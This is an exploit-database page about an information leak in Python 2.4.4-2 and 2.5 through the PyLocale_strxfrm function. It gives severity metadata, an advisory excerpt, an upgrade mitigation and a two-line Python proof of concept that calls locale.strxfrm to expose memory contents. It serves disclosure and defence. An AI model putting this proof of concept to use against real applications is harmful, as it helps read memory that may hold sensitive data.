header-logo
Suggest Exploit
vendor:
Python
by:
7.5
CVSS
HIGH
Information Leak
CWE
Product Name: Python
Affected Version From: Python 2.4.4-2
Affected Version To: Python 2.5
Patch Exists: NO
Related CWE:
CPE: a:python:python
Metasploit:
Other Scripts:
Platforms Tested:

Information Leak in Python Application using PyLocale_strxfrm function

This vulnerability allows remote attackers to read portions of memory in Python applications that use the 'PyLocale_strxfrm' function.

Mitigation:

Upgrade to a non-vulnerable version of Python.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23887/info

Python applications that use the 'PyLocale_strxfrm' function are prone to an information leak.

Exploiting this issue allows remote attackers to read portions of memory.

Python 2.4.4-2 and 2.5 are confirmed vulnerable. 

#!/usr/bin/python

import locale

print locale.setlocale(locale.LC_COLLATE, 'pl_PL.UTF8')
print repr(locale.strxfrm('a'))

Navigation

Suggest Exploit

Services By CQR